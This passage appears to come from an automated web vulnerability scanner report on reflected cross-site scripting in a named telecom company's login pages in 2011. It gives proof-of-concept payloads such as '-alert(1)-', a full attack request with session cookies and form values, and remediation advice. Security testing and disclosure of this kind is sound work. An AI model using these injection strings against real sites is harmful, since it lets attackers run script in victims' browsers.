Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/PageNotFound.aspx?404;https://www.frontier.com:443/Controls/VirtualCode.ashx7f651';alert(1)//40ebae18800?pageid=97&origPath=/NewStyleSheet.css/');//]]>
...[SNIP]...

2.99. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /Shop/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 293ac'-alert(1)-'b884da74b02dcdeaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shop293ac'-alert(1)-'b884da74b02dcdeaf/Login.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEwNjUxNjQ4MzgPZBYCZg9kFgJmD2QWBAIJDxYCHgRUZXh0BaMOPGRpdiBpZD0iaGVhZGVyIj4KICA8ZGl2IGNsYXNzPSJoZWFkZXJOYXYiPgogICAgPGRpdiBpZD0ibGVmdEhlYWRlciI%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvZ28iPgogICAgICAgIDxhIGlkPSJob21lTGluayIgdGl0bGU9IkZyb250aWVyIENvbW11bmljYXRpb25zIiBocmVmPSIvIj4KICAgICAgICAgIDxpbWcgYWx0PSJGcm9udGllckxvZ28iIHNyYz0iL2ltYWdlcy9GVFJNYWluL2Zyb250aWVyX0xvZ28uanBnIiBib3JkZXI9IjAiIGhlaWdodD0iNTEiIHdpZHRoPSIxNTYiPgogICAgICAgIDwvYT4KICAgICAgPC9kaXY%2BCiAgICAgIDx1bCBpZD0iZHJvcGRvd25fbmF2Ij4KICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uT05MWUxFR0FDWSIgaHJlZj0iL0JpbGxQYXkvTG9naW4uYXNweCI%2BT25saW5lIEJpbGwgUGF5PC9hPjwvbGk%2BCiAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9mcm9udGllci5teS55YWhvby5jb20vIj5Gcm9udGllciBNeSBZYWhvbyE8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cHM6Ly9sb2dpbi5mcm9udGllci5jb20vd2VibWFpbC8iPkZyb250aWVyIE1haWw8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uT05MWUxFR0FDWSIgaHJlZj0iL1Nob3AvTG9naW4uYXNweCI%2BTXkgQWNjb3VudDwvYT48L2xpPgogICAgICAgIDxsaSBpZD0ic2VsZWN0ZWQiIGNsYXNzPSJhZ2VudGxvZ2luIj5BZ2VudCBMb2dpbiAKICAgICAgICAgIDxkaXYgY2xhc3M9ImFycm93Ij48aW1nIHNyYz0iL2ltYWdlcy9GVFJNYWluL3NtYWxsX2Fycm93LnBuZyIgYm9yZGVyPSIwIiBoZWlnaHQ9IjQiIHdpZHRoPSI3Ij48L2Rpdj4KICAgICAgICAgIDx1bD4KICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9BZ2VudE9yZGVyaW5nL0xvZ2luLyI%2BUmVzaWRlbnRpYWwgQWdlbnQ8L2E%2BPC9saT4KICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9CdXNpbmVzc0FnZW50T3JkZXIvTG9naW4vIj5CdXNpbmVzcyBBZ2VudDwvYT48L2xpPgogICAgICAgICAgPC91bD4KICAgICAgICA8L2xpPgogICAgICA8L3VsPgogICAgICA8ZGl2IGNsYXNzPSJsb2NhdGlvbiI%2BQ3VycmVudCBMb2NhdGlvbjoKICAgICAgICA8YSBpZD0iTG9jYWxlIiBjbGFzcz0iY2hhbmdlTG9jYWxlIiBocmVmPSIjIj5TZWxlY3QgTG9jYXRpb248L2E%2BCiAgICAgIDwvZGl2PgogICAgPC9kaXY%2BCiAgICA8ZGl2IGlkPSJyaWdodEhlYWRlciI%2BCiAgICAgIDxmb3JtIGFjdGlvbj0iIyI%2BCiAgICAgICAgPGRpdiBjbGFzcz0ic2VhcmNoQm94Ij4KICAgICAgICAgIDxpbnB1dCBpZD0idHh0U2VhcmNoIiBjbGFzcz0ic2VhcmNoVGV4dCIgbmFtZT0idHh0U2VhcmNoIj4KI
CAgICAgICAgIDxpbnB1dCBpZD0iYnRuU2VhcmNoIiBjbGFzcz0iU2VhcmNoQnV0dG9uIiB2YWx1ZT0iIiBzcmM9Ii9JbWFnZXMvRlRSTWFpbi9zZWFjaF9idG4uZ2lmIiBuYW1lPSJidG5TZWFyY2giIHR5cGU9ImltYWdlIj4gPC9kaXY%2BCiAgICAgICAgPGRpdiBjbGFzcz0ic2VhcmNoQnV0dG9ucyI%2BCiAgICAgICAgICA8aW5wdXQgdmFsdWU9IkZyb250aWVyIiBjaGVja2VkPSJjaGVja2VkIiBuYW1lPSJyZG9TZWFyY2giIHR5cGU9InJhZGlvIj4KICAgICAgICAgIDxzcGFuIGlkPSJTRkxpbmsiPlNlYXJjaCBGcm9udGllcjwvc3Bhbj4KICAgICAgICAgIDxpbnB1dCB2YWx1ZT0iUG9ydGFsIiBuYW1lPSJyZG9TZWFyY2giIHR5cGU9InJhZGlvIj4KICAgICAgICAgIDxzcGFuIGlkPSJTV0xpbmsiPlNlYXJjaCB0aGUgV2ViPC9zcGFuPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvcm0%2BCiAgICA8L2Rpdj4KICA8L2Rpdj4KPC9kaXY%2BZAILD2QWDAIBD2QWAgIBD2QWAmYPZBYCZg9kFgICAQ9kFgYCBw8PFgQfAAUNRW50ZXIgUGhvbmUgIx4LTmF2aWdhdGVVcmwFNy9SZWdpb24vRGVmYXVsdC5hc3B4P3R5cGU9MSZ1cmw9JTJmU2hvcCUyZkxvZ2luLmFzcHglM2ZkZAIJDw8WAh8BBTcvUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZlNob3AlMmZMb2dpbi5hc3B4JTNmZGQCCw8PFgIeB1Zpc2libGVoZGQCAw9kFgICAQ9kFgJmDxYCHwAFvAE8ZGl2IGlkPSJUb3BOYXZfQ29udGFpbmVyIj4NCgkJPC9kaXY%2BDQo8aW5wdXQgbmFtZT0iaGZQYWdlVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZQYWdlVHlwZSIgdmFsdWU9IjEiLz4NCjxpbnB1dCBuYW1lPSJoZlJlY29yZF9UeXBlIiB0eXBlPSJoaWRkZW4iIGlkPSJoZlJlY29yZF9UeXBlIiB2YWx1ZT0iQ2F0ZWdvcnkiLz4NCmQCCQ9kFgYCAQ9kFgICAQ8WAh8ABWA8YSBocmVmPSIvRGVmYXVsdC5hc3B4Ij5Ib21lPC9hPiAmcmFxdW87IDxhIGhyZWY9Ii9TaG9wUmVzLmFzcHgiPlNob3AgRnJvbnRpZXI8L2E%2BICZyYXF1bzsgTG9naW5kAgMPFgIfAmhkAgUPZBYQAgEPFgIfAAUQR3Vlc3QgVXNlciBMb2dpbmQCAw8WAh8ABVRNeUFjY291bnQgd2lsbCBzaG93IHlvdXIgY3VycmVudCBzZXJ2aWNlcyBhbmQgU2hvcEZyb250aWVyIG9yZGVyIHN0YXR1cy48YnIgLz48YnIgLz5kAgUPFgIfAAWOAUlmIHlvdSBhcmUgYW4gZXhpc3RpbmcgRnJvbnRpZXIgY3VzdG9tZXIgYW5kIHdpc2ggdG8gbG9nIGludG8gb3Igc2lnbiB1cCBmb3IgT25saW5lIEJpbGwgUGF5LCA8bm9icj48YSBocmVmPSIvQmlsbFBheS8iPmNsaWNrIGhlcmU8L2E%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%2BIHRvIGhhdmUgeW91ciBhY2NvdW50IG51bWJlciBhbmQgcGluIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzIG9uIGZpbGUuPGJyIC8%2BPGJyIC8%2BPG5vYnI%2BPGEgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iPkN1c3RvbWVyIFNlcnZpY2U8L2E%2BPC9ub2JyPiBjY
W4gaGVscCB5b3Ugd2l0aCBhbnkgcXVlc3Rpb25zIHlvdSBtYXkgaGF2ZcKgd2l0aCByZWdhcmRzIHRvwqB0aGUgcHJvZHVjdHMgYW5kIHNlcnZpY2VzIG9uIHlvdXIgYWNjb3VudC5kAg0PDxYCHwJoZGQCEQ9kFgJmDxYCHwAF0Bk8ZGl2IGNsYXNzPSJmb290ZXIiPg0KICAgIDxkaXYgY2xhc3M9ImZvb3Rlci1zZWN0aW9ucyI%2BDQogICAgICAgIDxkaXYgaWQ9ImhlbHBTdXBwb3J0Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BSGVscCAmYW1wOyBTdXBwb3J0IDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iPkNvbnRhY3QgRnJvbnRpZXI8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2JpbGxpbmcvIj5CaWxsaW5nICZhbXA7IFBheW1lbnQgSW5mb3JtYXRpb248L2E%2BDQogICAgICAgICAgICAgICAgPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvY2FycmllcmZyZWV6ZS8iPlByb3RlY3QgWW91ciBBY2NvdW50PC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9yZXRhaWxzdG9yZXMvIj5Mb2NhdGUgUmV0YWlsIFN0b3JlczwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyaGVscC5jb20vdGVjaHN1cHBvcnQiPlRlY2huaWNhbA0KICAgICAgICAgICAgICAgICAgICBTdXBwb3J0PC9hPiA8L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgY2xhc3M9IkJvdHRvbV9zcGFjZXIiPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0icHJvZ3JhbXMiPg0KICAgICAgICAgICAgPHVsPg0KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0iZm9vdGVyX2hlYWRpbmdzIj5RdWljayBMaW5rczwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iaHR0cHM6Ly9mcm9udGllci5nbG9ieXNvbmxpbmUuY29tL2N2L3NjcmlwdHMvQUJFMC9lbmcvbG9nLmFzcD9ncnU9NDM3NjYyOTEwJmFtcDtzZWM9Ij4NCiAgICAgICAgICAgICAgICAgICAgQnVzaW5lc3MgT25saW5lIEJpbGwgUGF5PC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9mcmllbmRsaW5rLyI%2BQ3VzdG9tZXIgUmVmZXJyYWw8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2RvbmF0ZS8iPkdyZWF0IEZyb250aWVyIERvbmF0ZTwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BP
GEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvZGlzY291bnRwcm9ncmFtcy8iPkRpc2NvdW50IFByb2dyYW1zPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvYWR2ZXJ0aXNlLyI%2BQWR2ZXJ0aXNlIHdpdGggVXM8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICA8L3VsPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBjbGFzcz0iQm90dG9tX3NwYWNlciI%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGlkPSJhYm91dCI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPkFib3V0IFVzPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL2NvcnBvcmF0ZV9jb21tdW5pY2F0aW9ucy8iPkNvcnBvcmF0ZSBDb21tdW5pY2F0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSJodHRwOi8vY29ycG9yYXRlLmZyb250aWVyLmNvbS9kZWZhdWx0LmFzcHg%2FbT01JmFtcDtwPTQzIj5DYXJlZXJzPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9waHguY29ycG9yYXRlLWlyLm5ldC9waG9lbml4LnpodG1sP2M9NjY1MDgmYW1wO3A9aXJvbC1pcmhvbWUiPkludmVzdG9yDQogICAgICAgICAgICAgICAgICAgIFJlbGF0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSJodHRwOi8vcGh4LmNvcnBvcmF0ZS1pci5uZXQvcGhvZW5peC56aHRtbD9jPTY2NTA4JmFtcDtwPWlyb2wtbmV3cyZhbXA7bnlvPTAiPg0KICAgICAgICAgICAgICAgICAgICBQcmVzcyBSb29tPC9hPjwvbGk%2BPGxpPjxhIGhyZWY9Ii9mYWNlc19vZl9mcm9udGllciI%2BRmFjZXMgb2YgRnJvbnRpZXI8L2E%2BPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJCb3R0b21fc3BhY2VyIj4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgaWQ9ImxlZ2FsUmVndWxhdG9yeSI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPkxlZ2FsICZhbXA7IFJlZ3VsYXRvcnk8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvcG9saWNpZXMvIj5Qb2xpY2llcyAmYW1wOyBOb3RpZmljYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL3Rlcm1zLyI%2BVGVybXMgYW5kIENvbmRpdGlvbnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL3dob2xlc2FsZS8iPldob2xlc2FsZSAmYW1wOyBDYXJyaWVyIFNlcnZpY2VzPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9jYXJyaWVyLmZyb250aWVyY29ycC5jb20vY3J0Zi90YXJpZmZzL2luZGV4LmNmbT9mdXNlYWN0aW9uPW1haW4mYW1
wO3NjdG5JRD0xOSI%2BDQogICAgICAgICAgICAgICAgICAgIFRhcmlmZnM8L2E%2BPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8cCBjbGFzcz0iY2xlYXIiPg0KICAgICAgICA8L3A%2BDQogICAgICAgIDxkaXYgaWQ9ImZvb3RlckNyZWRpdHMiPg0KICAgICAgICAgICAgPGRpdj4NCiAgICAgICAgICAgICAgICA8c3Ryb25nPiZjb3B5OzIwMTEgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgQ29ycG9yYXRpb24uIEFsbCByaWdodHMgcmVzZXJ2ZWQuPC9zdHJvbmc%2BDQogICAgICAgICAgICA8L2Rpdj4NCiAgICAgICAgICAgIDwhLS0JPGltZyBzdHlsZT0iZmxvYXQ6IHJpZ2h0OyIgd2lkdGg9IjMzOXB4IiBoZWlnaHQ9IjM3cHgiIGFsdD0iIiBzcmM9Ii9pbWFnZXMvRlRSTWFpbi9waG9uZV9jb3B5LnBuZyIgIC8%2BLS0%2BDQogICAgICAgIDwvZGl2Pg0KICAgIDwvZGl2Pg0KPC9kaXY%2BZAITDxYCHwAFiSE8YnI%2BCjwhLS1NYXJrdXAgZm9yIEluaXRpYWwgT3ZlcmxheSB0aGF0IGNhbm5vdCBiZSBjbG9zZWQgd2l0aG91dCBzdWJtaXR0aW5nIHBob25lL3ppcC0tPgo8ZGl2IGlkPSJvdmVyU2NyZWVuIj4mbmJzcDs8L2Rpdj4KPGRpdiBpZD0ib3ZlcmxheUluaXRpYWxGb3JtIiBjbGFzcz0ib3ZlcmxheSI%2BCiAgICA8aW1nIGFsdD0iIiBzcmM9Ii9pbWFnZXMvRlRSTWFpbi9ncmFkaWVudEJveC5wbmciIGhlaWdodD0iMjYzIiB3aWR0aD0iNjQwIj4KICAgIDxkaXYgY2xhc3M9Im92ZXJsYXlJbm5lciI%2BCiAgICAgICAgPGgxPkhlbGxvITwvaDE%2BCiAgICAgICAgPHA%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%2BCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVBZmllbGQiPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbWF4bGVuZ3RoPSIzIiBpZD0icGhvbmVOdW1BIiBuYW1lPSJwaG9uZU51bUEiIG9ua2V5dXA9InJldHVybiB0cmFwS2V5cyhldmVudCx0aGlzLCdwaG9uZU51bUInKTsiIHZhbHVlPSIiIGNsYXNzPSJkZXB0aElucHV0IHRocmVlLWRpZyBwMSIgdHlwZT0idGV4dCI%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVCZmllbGQiPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbWF4bGVuZ3RoPSIzIiBpZD0icGhvbmVOdW1CIiBuYW1lPSJwaG9uZU51bUIiIG9ua2V5dXA9InJldHVybiB0cmFwS2V5cyhldmVudCx0aGlzLCdwaG9uZU51bUMnKTsiIHZhbHVlPSIiIGNsYXNzPSJkZXB0aElucHV0IHRocmVlLWRpZyBwMiIgdHlwZT0idGV4dCI%2BCiAgICAgICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0icGhvbmVDZmllbGQiPgogICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbWF4bGVuZ3RoPSI0IiBpZD0icGhvbmVOdW1DIiBuYW1lPSJwaG9uZU51bUMiIHZhbHVlPSIiIGN
sYXNzPSJkZXB0aElucHV0IGZvdXItZGlnIHAzIiB0eXBlPSJ0ZXh0Ij48L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iemlwTGluZSI%2BCiAgICAgICAgICAgICAgICAgICAgPGxhYmVsPm9yIFppcCBDb2RlPC9sYWJlbD4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBGaWVsZCI%2BPGlucHV0IG1heGxlbmd0aD0iNSIgbmFtZT0iemlwQ29kZSIgdmFsdWU9IiIgaWQ9InppcElucHV0MSIgY2xhc3M9ImRlcHRoSW5wdXQgemlwIiB0eXBlPSJ0ZXh0Ij48L2Rpdj4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ic3VibWl0TGluZSI%2BPGlucHV0IGlkPSJvdmVybGF5U3VibWl0IiB2YWx1ZT0iIiB0eXBlPSJzdWJtaXQiPjwvZGl2PgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2hlY2tMaW5lIj4KICAgICAgICAgICAgICAgICAgICA8aW5wdXQgbmFtZT0ibmV3YmllIiB0eXBlPSJjaGVja2JveCI%2BCiAgICAgICAgICAgICAgICAgICAgPGxhYmVsIGlkPSJuZXdiVGV4dCIgZm9yPSJuZXdiaWUiPkNoZWNrIGhlcmUgaWYgeW91IGFyZSBhIG5ldyBjdXN0b21lci48L2xhYmVsPgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZm9ybT4KICAgIDwvZGl2Pgo8L2Rpdj4KPCEtLU1hcmt1cCBmb3IgIE92ZXJsYXkgdGhhdCBjYW4gYmUgY2xvc2VkIHdpdGhvdXQgc3VibWl0dGluZyBwaG9uZS96aXAtLT4KPGRpdiBpZD0ib3ZlcmxheUZvcm0iIGNsYXNzPSJvdmVybGF5Ij4KICAgIDxpbWcgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL2dyYWRpZW50Qm94LnBuZyIgaGVpZ2h0PSIyNjMiIHdpZHRoPSI2NDAiPgogICAgPGRpdiBjbGFzcz0ib3ZlcmxheUlubmVyIj4KICAgICAgICA8YSBocmVmPSIjIiBjbGFzcz0iY2xvc2VPdmVybGF5Ij5DTE9TRTwvYT4KICAgICAgICA8aDE%2BSGVsbG8hPC9oMT4KICAgICAgICA8cD5UbyBwcm92aWRlIHlvdSB3aXRoIHByb2R1Y3RzIGFuZCBzZXJ2aWNlcyB0aGF0IGJlc3QgbWVldCB5b3VyIG5lZWRzLCB3ZSBuZWVkIHRvIGtub3cgeW91ciBsb2NhdGlvbi4gVGhpcyBpbmZvcm1hdGlvbiBpcyBrZXB0IHByaXZhdGUhPC9wPgogICAgICAgIDxmb3JtIG5hbWU9ImZGb3JtMiIgYWN0aW9uPSIjIiBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICA8ZGl2IGlkPSJlcnJvckZpZWxkMiIgY2xhc3M9Im92ZXJsYXlFcnJvciI%2BUGxlYXNlIGVudGVyIGEgdmFsaWQgcGhvbmUgbnVtYmVyIG9yIHppcCBjb2RlLjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUxpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0icGhvbmUiPlBob25lIE51bWJlcjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUZpZWxkIj4KICAgICAgICAgICAgICAgICAgICA8ZGl
2IGNsYXNzPSJwaG9uZUFmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUNoYW5nZUEiIG5hbWU9InBob25lTnVtQ2hhbmdlQSIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQ2hhbmdlQicpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAxIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUJmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUNoYW5nZUIiIG5hbWU9InBob25lTnVtQ2hhbmdlQiIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQ2hhbmdlQycpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAyIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUNmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjQiIGlkPSJwaG9uZU51bUNoYW5nZUMiIG5hbWU9InBob25lTnVtQ2hhbmdlQyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgZm91ci1kaWcgcDMiIHR5cGU9InRleHQiPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBMaW5lIj4KICAgICAgICAgICAgICAgIDxsYWJlbD5vciBaaXAgQ29kZTwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBGaWVsZCI%2BPGlucHV0IG1heGxlbmd0aD0iNSIgbmFtZT0iemlwQ29kZSIgdmFsdWU9IiIgaWQ9InppcElucHV0MiIgY2xhc3M9ImRlcHRoSW5wdXQgemlwIiB0eXBlPSJ0ZXh0Ij48L2Rpdj4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgIDxkaXYgY2xhc3M9InN1Ym1pdExpbmUiPjxpbnB1dCBpZD0ib3ZlcmxheVN1Ym1pdENoYW5nZSIgdmFsdWU9IiIgdHlwZT0ic3VibWl0Ij48L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iY2hlY2tMaW5lIj4KICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSJuZXdiaWUiIHR5cGU9ImNoZWNrYm94Ij4KICAgICAgICAgICAgICAgIDxsYWJlbCBpZD0ibmV3YlRleHQiIGZvcj0ibmV3YmllIj5DaGVjayBoZXJlIGlmIHlvdSBhcmUgYSBuZXcgY3VzdG9tZXIuPC9sYWJlbD4KICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgPC9mb3JtPgogICAgPC9kaXY%2BCjwvZGl2PgpkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShjdGwwMCRjdGwwMCRGT0Jhc2VQSCRDb250ZW50UEgkaW1iU3VibWl0kXWwz0NKLGky0ztisQuqKCTAsjc%3D&hfPageType=1&hfRecord_Type=Category&ctl00%
24ctl00%24FOBasePH%24ContentPH%24txtVaAcctNum=67654764575467&ctl00%24ctl00%24FOBasePH%24ContentPH%24txtVaPin=6457&ctl00%24ctl00%24FOBasePH%24ContentPH%24imbSubmit.x=12&ctl00%24ctl00%24FOBasePH%24ContentPH%24imbSubmit.y=3&phoneNumA=&phoneNumB=&phoneNumC=&zipCode= HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: https://www.frontier.com/Shop/Login.aspx
Cache-Control: max-age=0
Origin: https://www.frontier.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=ks40bd45i0qr22450as2ev2m; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%252520Login%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fwww.frontier.com%25252Fimages%25252Fbtn_submit_shop.gif%2526ot%253DIMAGE%26oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A%252F%252Fgames.frontier.com%252Fgame.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43382


